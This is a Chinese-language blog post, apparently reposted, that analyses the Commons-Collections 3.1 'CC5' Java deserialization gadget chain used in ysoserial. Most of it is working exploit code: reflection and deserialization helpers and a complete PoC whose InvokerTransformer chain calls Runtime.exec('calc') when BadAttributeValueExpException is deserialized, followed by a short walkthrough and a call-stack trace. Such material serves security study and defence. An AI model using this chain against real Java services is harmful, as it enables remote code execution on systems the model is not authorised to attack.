热门标签
热门文章
- 1我和CSDN的故事——输出就是最好的学习!_我与平台的故事
- 2MT25QU02GCBB8E12-0SIT(2Gb)串行NOR闪存,pdf
- 3neo4j配置远程访问web控制台(linux、树莓派)_neo4j控制台映射
- 4“约见”面试官系列之常见面试题之第五十一篇之CSS Sprites(建议收藏)_面试css sprite 是什么
- 5“非递归” 实现二叉树的“前序、中序、后序、层序”遍历_不递归 先序遍历
- 6mysql之过滤分组_mysql 对分组后组内的数据过滤
- 7哪些算法可以用于文字识别?_文字识别算法
- 8SpringBoot项目如何部署到服务器_springboot部署到服务器
- 9 Facebook 发布嵌在聊天软件里的智能 AI
- 10代码随想录算法训练营第十七天 | 二叉树 (4)
当前位置: article > 正文
『Java安全』反序列化-CC5反序列化漏洞POP链分析_ysoserial CommonsCollections5 PoC分析_java c1-c5漏洞
作者:我家自动化 | 2024-06-09 15:58:43
赞
踩
java c1-c5漏洞
前言
由于jdk8修复了AnnotationInvokerHandler,cc1用不了了
cc5在cc1点基础上做了小的改进,还是使用Commons-Collections 3.1,jdk8适用
代码复现
工具类
反射get/set:
ReflectPacked/ValueGetterSetter.java
package ReflectPacked; import java.lang.reflect.Field; public class ValueGetterSetter { public static void setValue(Object obj, String name, Object value) throws Exception{ Field field = obj.getClass().getDeclaredField(name); field.setAccessible(true); field.set(obj, value); } public static Object getValue(Object obj, String name) throws Exception{ Field field = obj.getClass().getDeclaredField(name); field.setAccessible(true); return field.get(obj); } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
反序列化:
UnserializePacked.Unserialize.java
package UnserializePacked; import java.io.*; public class Unserialize { public static void unserialize(Object obj) throws Exception{ File f = File.createTempFile("temp", "out"); ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(f)); oos.writeObject(obj); oos.close(); ObjectInputStream ois = new ObjectInputStream(new FileInputStream(f)); Object o = ois.readObject(); System.out.println(o); ois.close(); f.deleteOnExit(); } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
PoC
package cc.cc5; import ReflectPacked.ValueGetterSetter; import UnserializePacked.Unserialize; import org.apache.commons.collections.Transformer; import org.apache.commons.collections.functors.ChainedTransformer; import org.apache.commons.collections.functors.ConstantTransformer; import org.apache.commons.collections.functors.InvokerTransformer; import org.apache.commons.collections.keyvalue.TiedMapEntry; import org.apache.commons.collections.map.LazyMap; import javax.management.BadAttributeValueExpException; import java.util.HashMap; import java.util.Map; public class PoC { public static void main(String[] args) throws Exception { ChainedTransformer chainedTransformer = new ChainedTransformer( new Transformer[]{ new ConstantTransformer(Runtime.class), new InvokerTransformer( "getMethod", new Class[]{ String.class, Class[].class }, new Object[]{ "getRuntime", new Class[0] } ), new InvokerTransformer( "invoke", new Class[]{ Object.class, Object[].class }, new Object[]{ null, new Object[0] } ), new InvokerTransformer( "exec", new Class[]{ String.class }, new Object[]{ "calc" } ) } ); Map lazyMap = LazyMap.decorate(new HashMap(), chainedTransformer); TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "a"); BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(null); ValueGetterSetter.setValue(badAttributeValueExpException, "val", tiedMapEntry); Unserialize.unserialize(badAttributeValueExpException); } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
代码审计 | 原理分析
前半部分和cc1原理一致不做分析了,只分析改进的地方
1. LazyMap.get()调用this.factory.transform()
2. TiedMapEntry.toString()调用this.map.get()
TiedMapEntry的构造器需要传入map和key
然后它的toString方法调用了this.map.get(key)
传入map是LazyMap刚好能触发
3. BadAttributeValueExpException反序列化触发this.val.toString()
ROME反序列化就是用了这个类
反射赋值即可
POP链
transform:121, ChainedTransformer (org.apache.commons.collections.functors) get:151, LazyMap (org.apache.commons.collections.map) getValue:73, TiedMapEntry (org.apache.commons.collections.keyvalue) toString:131, TiedMapEntry (org.apache.commons.collections.keyvalue) readObject:86, BadAttributeValueExpException (javax.management) invoke0:-1, NativeMethodAccessorImpl (sun.reflect) invoke:62, NativeMethodAccessorImpl (sun.reflect) invoke:43, DelegatingMethodAccessorImpl (sun.reflect) invoke:498, Method (java.lang.reflect) invokeReadObject:1058, ObjectStreamClass (java.io) readSerialData:1909, ObjectInputStream (java.io) readOrdinaryObject:1808, ObjectInputStream (java.io) readObject0:1353, ObjectInputStream (java.io) readObject:373, ObjectInputStream (java.io) unserialize:14, Unserialize (UnserializePacked) main:61, PoC (cc.cc5)
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
完
欢迎关注我的CSDN博客 :@Ho1aAs
版权属于:Ho1aAs
本文链接:https://blog.csdn.net/Xxy605/article/details/123450543
版权声明:本文为原创,转载时须注明出处及本声明
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家自动化/article/detail/694822
推荐阅读
相关标签
